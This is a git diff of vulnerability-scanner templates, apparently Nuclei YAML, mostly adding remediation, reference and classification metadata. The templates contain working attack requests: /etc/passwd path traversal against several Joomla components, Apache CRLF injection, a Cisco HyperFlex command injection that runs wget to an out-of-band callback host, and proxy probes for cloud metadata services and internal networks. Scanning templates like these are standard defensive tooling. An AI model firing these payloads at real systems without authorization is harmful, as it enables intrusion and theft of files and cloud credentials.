"{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1478.yaml b/cves/2010/CVE-2010-1478.yaml index 850f9aa938..47844c9973 100644 --- a/cves/2010/CVE-2010-1478.yaml +++ b/cves/2010/CVE-2010-1478.yaml @@ -4,24 +4,26 @@ info: name: Joomla! Component Jfeedback 1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: | - https://www.exploit-db.com/exploits/12145 - https://www.cvedetails.com/cve/CVE-2010-1478 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1478 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1491.yaml b/cves/2010/CVE-2010-1491.yaml index 865fd5f04f..1c5996a40d 100644 --- a/cves/2010/CVE-2010-1491.yaml +++ b/cves/2010/CVE-2010-1491.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12318 - https://www.cvedetails.com/cve/CVE-2010-1491 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1491 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1494.yaml b/cves/2010/CVE-2010-1494.yaml index 290ff32940..65870bc27c 100644 --- a/cves/2010/CVE-2010-1494.yaml +++ b/cves/2010/CVE-2010-1494.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12113 - https://www.cvedetails.com/cve/CVE-2010-1494 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1494 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1495.yaml b/cves/2010/CVE-2010-1495.yaml index 3d3b10b6bb..7cd0f3ba50 100644 --- a/cves/2010/CVE-2010-1495.yaml +++ b/cves/2010/CVE-2010-1495.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component Matamko 1.01 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12286 - https://www.cvedetails.com/cve/CVE-2010-1495 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1495 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1531.yaml b/cves/2010/CVE-2010-1531.yaml index c118f123cd..ff3ed174e0 100644 --- a/cves/2010/CVE-2010-1531.yaml +++ b/cves/2010/CVE-2010-1531.yaml @@ -4,24 +4,25 @@ info: name: Joomla! Component redSHOP 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to a supported version. reference: - https://www.exploit-db.com/exploits/12054 - https://www.cvedetails.com/cve/CVE-2010-1531 tags: cve,cve2010,joomla,lfi + classification: + cve-id: CVE-2010-1531 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" - - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2016/CVE-2016-4975.yaml b/cves/2016/CVE-2016-4975.yaml index f94762b21e..3be31a05a0 100644 --- a/cves/2016/CVE-2016-4975.yaml +++ b/cves/2016/CVE-2016-4975.yaml @@ -2,10 +2,14 @@ id: CVE-2016-4975 info: name: Apache mod_userdir CRLF injection - author: melbadry9,nadino,xElkomy,sullo - severity: low + author: melbadry9,nadino,xElkomy + severity: medium description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. + remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. tags: crlf,generic,cves,cve2016,apache + reference: + - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 + - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -16,9 +20,9 @@ requests: - method: GET path: - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" - matchers: - type: regex regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' part: header +# Enhanced by cs on 2022/02/14 diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml index d7e5339d49..db00527c79 100644 --- a/cves/2021/CVE-2021-1497.yaml +++ b/cves/2021/CVE-2021-1497.yaml @@ -1,9 +1,8 @@ id: CVE-2021-1497 - info: name: Cisco HyperFlex HX Data Platform RCE description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. - author: gy741,sullo + author: gy741 severity: critical reference: - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ @@ -19,7 +18,6 @@ info: cvss-score: 9.80 cve-id: CVE-2021-1497 cwe-id: CWE-78 - requests: - raw: - | @@ -27,23 +25,20 @@ requests: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} - | POST /auth HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}} - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml index 383a94ea63..f4772ed916 100644 --- a/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml +++ b/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml @@ -18,6 +18,7 @@ requests: - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" - "{{BaseURL}}/phpmyadmin/setup/index.php" + - "{{BaseURL}}/pma/setup/index.php" stop-at-first-match: true matchers-condition: and diff --git a/misconfiguration/proxy/metadata-alibaba.yaml b/misconfiguration/proxy/metadata-alibaba.yaml index 224a5be859..885221149e 100644 --- a/misconfiguration/proxy/metadata-alibaba.yaml +++ b/misconfiguration/proxy/metadata-alibaba.yaml @@ -1,19 +1,17 @@ id: metadata-service-alibaba - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Alibaba Metadata Service Check author: sullo severity: critical description: The Alibaba host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://www.alibabacloud.com/help/doc-detail/108460.htm - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -23,21 +21,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - requests: - raw: - |+ GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1 Host: {{hostval}} - payloads: hostval: - alibaba.interact.sh - 100.100.100.200 - unsafe: true matchers: - type: word part: body words: - "zone-id" +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-aws.yaml b/misconfiguration/proxy/metadata-aws.yaml index 3a5e11cb49..7e4c383c7e 100644 --- a/misconfiguration/proxy/metadata-aws.yaml +++ b/misconfiguration/proxy/metadata-aws.yaml @@ -1,19 +1,17 @@ id: metadata-service-aws - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Amazon AWS Metadata Service Check author: sullo severity: critical description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -23,18 +21,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - requests: - raw: - |+ GET http://{{hostval}}/latest/meta-data/ HTTP/1.1 Host: {{hostval}} - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word @@ -43,3 +38,4 @@ requests: - "public-ipv4" - "privateIp" condition: or +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-azure.yaml b/misconfiguration/proxy/metadata-azure.yaml index f5fb6656ff..d29c056c23 100644 --- a/misconfiguration/proxy/metadata-azure.yaml +++ b/misconfiguration/proxy/metadata-azure.yaml @@ -1,19 +1,17 @@ id: metadata-service-azure - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Microsoft Azure Cloud Metadata Service Check author: sullo severity: critical description: The Microsoft Azure cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.microsoft.com/en-us/azure/virtual-machines/linux/instance-metadata-service?tabs=windows - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -23,19 +21,16 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - requests: - raw: - |+ GET http://{{hostval}}/metadata/instance?api-version=2021-02-01 HTTP/1.1 Host: {{hostval}} Metadata: true - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word @@ -44,3 +39,4 @@ requests: - "osType" - "ipAddress" condition: and +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-digitalocean.yaml b/misconfiguration/proxy/metadata-digitalocean.yaml index 28f5b7cd0d..6139366823 100644 --- a/misconfiguration/proxy/metadata-digitalocean.yaml +++ b/misconfiguration/proxy/metadata-digitalocean.yaml @@ -1,19 +1,17 @@ id: metadata-service-digitalocean - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: DigitalOcean Metadata Service Check author: sullo severity: critical description: The DigitalOcean host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://developers.digitalocean.com/documentation/metadata/ - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -23,21 +21,19 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - requests: - raw: - |+ GET http://{{hostval}}/metadata/v1.json HTTP/1.1 Host: {{hostval}} - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word part: body words: - "droplet_id" +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-google.yaml b/misconfiguration/proxy/metadata-google.yaml index 7f5be6d32f..df70242813 100644 --- a/misconfiguration/proxy/metadata-google.yaml +++ b/misconfiguration/proxy/metadata-google.yaml @@ -1,19 +1,17 @@ id: metadata-service-gcp - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Google GCP Metadata Service Check author: sullo severity: critical description: The Google cloud (GCP) host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://cloud.google.com/compute/docs/metadata/default-metadata-values - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -23,22 +21,20 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - requests: - raw: - |+ GET http://{{hostval}}/computeMetadata/v1/project/ HTTP/1.1 Host: {{hostval}} Metadata-Flavor: Google - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word part: body words: - "attributes/" +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-hetzner.yaml b/misconfiguration/proxy/metadata-hetzner.yaml index 82e837e888..fb6744c9bd 100644 --- a/misconfiguration/proxy/metadata-hetzner.yaml +++ b/misconfiguration/proxy/metadata-hetzner.yaml @@ -1,19 +1,17 @@ id: metadata-service-hetzner - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Hetzner Cloud Metadata Service Check author: sullo severity: critical description: The Hetzner Cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.hetzner.cloud/#server-metadata - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -23,18 +21,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - requests: - raw: - |+ GET http://{{hostval}}/v1/metadata/private-networks HTTP/1.1 Host: {{hostval}} - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word @@ -44,3 +39,4 @@ requests: - "local-ipv4:" - "instance-id:" condition: or +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-openstack.yaml b/misconfiguration/proxy/metadata-openstack.yaml index 6e215902a5..f5f729ae1f 100644 --- a/misconfiguration/proxy/metadata-openstack.yaml +++ b/misconfiguration/proxy/metadata-openstack.yaml @@ -1,5 +1,4 @@ id: metadata-service-openstack - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to # the proxy using the full metadata URL, which the proxy will fulfull to its @@ -7,33 +6,34 @@ id: metadata-service-openstack # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Openstack Metadata Service Check author: sullo severity: critical description: The Openstack host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.openstack.org/nova/latest/admin/metadata-service.html - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ tags: exposure,config,openstack,proxy,misconfig,metadata - + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-441 requests: - raw: - |+ GET http://{{hostval}}/openstack/latest HTTP/1.1 Host: {{hostval}} - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word part: body words: - "vendor_data.json" +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/metadata-oracle.yaml b/misconfiguration/proxy/metadata-oracle.yaml index cfdaa520a4..383d2a21b8 100644 --- a/misconfiguration/proxy/metadata-oracle.yaml +++ b/misconfiguration/proxy/metadata-oracle.yaml @@ -1,40 +1,40 @@ id: metadata-service-oracle - # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Oracle Cloud Metadata Service Check author: sullo severity: critical description: The Oracle cloud host is configured as a proxy which allows access to the instance metadata IMDSv1 service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.oracle.com/en-us/iaas/Content/Compute/Tasks/gettingmetadata.htm - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ tags: exposure,config,oracle,proxy,misconfig,metadata - + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-441 requests: - raw: - |+ GET http://{{hostval}}/opc/v1/instance HTTP/1.1 Host: {{hostval}} Metadata: true - payloads: hostval: - aws.interact.sh - 169.254.169.254 - unsafe: true matchers: - type: word part: body words: - "availabilityDomain" +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/open-proxy-internal.yaml b/misconfiguration/proxy/open-proxy-internal.yaml index 4dd01cf546..eddd4de2cb 100644 --- a/misconfiguration/proxy/open-proxy-internal.yaml +++ b/misconfiguration/proxy/open-proxy-internal.yaml @@ -1,12 +1,11 @@ id: open-proxy-internal - info: name: Open Proxy To Internal Network author: sullo severity: high tags: exposure,config,proxy,misconfig,fuzz description: The host is configured as a proxy which allows access to other hosts on the internal network. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy @@ -15,109 +14,83 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-441 - requests: - raw: - |+ GET / HTTP/1.1 Host: {{Hostname}} - - |+ GET http://192.168.0.1/ HTTP/1.1 Host: 192.168.0.1 - - |+ GET https://192.168.0.1/ HTTP/1.1 Host: 192.168.0.1 - - |+ GET http://192.168.0.1:22/ HTTP/1.1 Host: 192.168.0.1 - - |+ GET http://192.168.1.1/ HTTP/1.1 Host: 192.168.1.1 - - |+ GET https://192.168.1.1/ HTTP/1.1 Host: 192.168.1.1 - - |+ GET http://192.168.1.1:22/ HTTP/1.1 Host: 192.168.1.1 - - |+ GET http://192.168.2.1/ HTTP/1.1 Host: 192.168.2.1 - - |+ GET https://192.168.2.1/ HTTP/1.1 Host: 192.168.2.1 - - |+ GET http://192.168.2.1:22/ HTTP/1.1 Host: 192.168.2.1 - - |+ GET http:/10.0.0.1/ HTTP/1.1 Host: 10.0.0.1 - - |+ GET https://10.0.0.1/ HTTP/1.1 Host: 10.0.0.1 - - |+ GET http://10.0.0.1:22/ HTTP/1.1 Host: 10.0.0.1 - - |+ GET http:/172.16.0.1/ HTTP/1.1 Host: 172.16.0.1 - - |+ GET https://172.16.0.1/ HTTP/1.1 Host: 172.16.0.1 - - |+ GET http://172.16.0.1:22/ HTTP/1.1 Host: 172.16.0.1 - - |+ GET http:/intranet/ HTTP/1.1 Host: intranet - - |+ GET https://intranet/ HTTP/1.1 Host: intranet - - |+ GET http://intranet:22/ HTTP/1.1 Host: intranet - - |+ GET http:/mail/ HTTP/1.1 Host: mail - - |+ GET https://mail/ HTTP/1.1 Host: mail - - |+ GET http://mail:22/ HTTP/1.1 Host: mail - - |+ GET http:/ntp/ HTTP/1.1 Host: ntp - - |+ GET https://ntp/ HTTP/1.1 Host: ntp - - |+ GET http://ntp:22/ HTTP/1.1 Host: ntp - unsafe: true matchers: - type: dsl @@ -133,4 +106,5 @@ requests: - (!contains(body_1, "Microsoft Azure App")) && (contains(body_2, "Microsoft Azure App") || contains(body_3, "Microsoft Azure App")) || contains(body_4, "Microsoft Azure App") || contains(body_5, "Microsoft Azure App") || contains(body_6, "Microsoft Azure App") || contains(body_7, "Microsoft Azure App") || contains(body_8, "Microsoft Azure App") || contains(body_9, "Microsoft Azure App") || contains(body_10, "Microsoft Azure App") || contains(body_11, "Microsoft Azure App") || contains(body_12, "Microsoft Azure App") || contains(body_13, "Microsoft Azure App") || contains(body_14, "Microsoft Azure App") || contains(body_15, "Microsoft Azure App") || contains(body_16, "Microsoft Azure App") || contains(body_17, "Microsoft Azure App") || contains(body_18, "Microsoft Azure App") || contains(body_19, "Microsoft Azure App") || contains(body_20, "Microsoft Azure App") || contains(body_21, "Microsoft Azure App") || contains(body_22, "Microsoft Azure App") || contains(body_23, "Microsoft Azure App") - (!contains(body_1, "ssh")) && (contains(body_2, "ssh") || contains(body_3, "ssh")) || contains(body_4, "ssh") || contains(body_5, "ssh") || contains(body_6, "ssh") || contains(body_7, "ssh") || contains(body_8, "ssh") || contains(body_9, "ssh") || contains(body_10, "ssh") || contains(body_11, "ssh") || contains(body_12, "ssh") || contains(body_13, "ssh") || contains(body_14, "ssh") || contains(body_15, "ssh") || contains(body_16, "ssh") || contains(body_17, "ssh") || contains(body_18, "ssh") || contains(body_19, "ssh") || contains(body_20, "ssh") || contains(body_21, "ssh") || contains(body_22, "ssh") || contains(body_23, "ssh") || contains(body_24, "ssh") - (!contains(body_1, "SSH")) && (contains(body_2, "SSH") || contains(body_3, "SSH")) || contains(body_4, "SSH") || contains(body_5, "SSH") || contains(body_6, "SSH") || contains(body_7, "SSH") || contains(body_8, "SSH") || contains(body_9, "SSH") || contains(body_10, "SSH") || contains(body_11, "SSH") || contains(body_12, "SSH") || contains(body_13, "SSH") || contains(body_14, "SSH") || contains(body_15, "SSH") || contains(body_16, "SSH") || contains(body_17, "SSH") || contains(body_18, "SSH") || contains(body_19, "SSH") || contains(body_20, "SSH") || contains(body_21, "SSH") || contains(body_22, "SSH") || contains(body_23, "SSH") - condition: or \ No newline at end of file + condition: or +# Enhanced by cs on 2022/02/14 diff --git a/misconfiguration/proxy/open-proxy-localhost.yaml b/misconfiguration/proxy/open-proxy-localhost.yaml index 7fe8f1e90a..3a132a170e 100644 --- a/misconfiguration/proxy/open-proxy-localhost.yaml +++ b/misconfiguration/proxy/open-proxy-localhost.yaml @@ -1,12 +1,11 @@ id: open-proxy-http-portscan - info: name: Open Proxy to Other Web Ports on Proxy's localhost Interface author: sullo severity: high tags: exposure,config,proxy,misconfig,fuzz description: The host is configured as a proxy which allows access to web ports on the host's internal interface. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. reference: - https://blog.projectdiscovery.io/abusing-reverse-proxies-internal-access/ - https://en.wikipedia.org/wiki/Open_proxy @@ -15,33 +14,26 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-441 - requests: - raw: - |+ GET / HTTP/1.1 Host: {{Hostname}} - - |+ GET http://somethingthatdoesnotexist/ HTTP/1.1 Host: somethingthatdoesnotexist - - |+ GET http://127.0.0.1/ HTTP/1.1 Host: 127.0.0.1 - - |+ GET https://127.0.0.1/ HTTP/1.1 Host: 127.0.0.1 - - |+ GET http://localhost/ HTTP/1.1 Host: localhost - - |+ GET https://localhost/ HTTP/1.1 Host: localhost - unsafe: true req-condition: true stop-at-first-match: true @@ -59,3 +51,4 @@ requests: - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows")) - (!contains(body_1, "Welcome to Windows") && !contains(body_2, "Welcome to Windows")) && (contains(body_3, "Welcome to Windows") || contains(body_4, "Welcome to Windows") || contains(body_5, "Welcome to Windows") || contains(body_6, "Welcome to Windows")) - (!contains(body_1, "It works") && !contains(body_2, "It works")) && (contains(body_3, "It works") || contains(body_4, "It works") || contains(body_5, "It works") || contains(body_6, "It works")) +# Enhanced by cs on 2022/02/14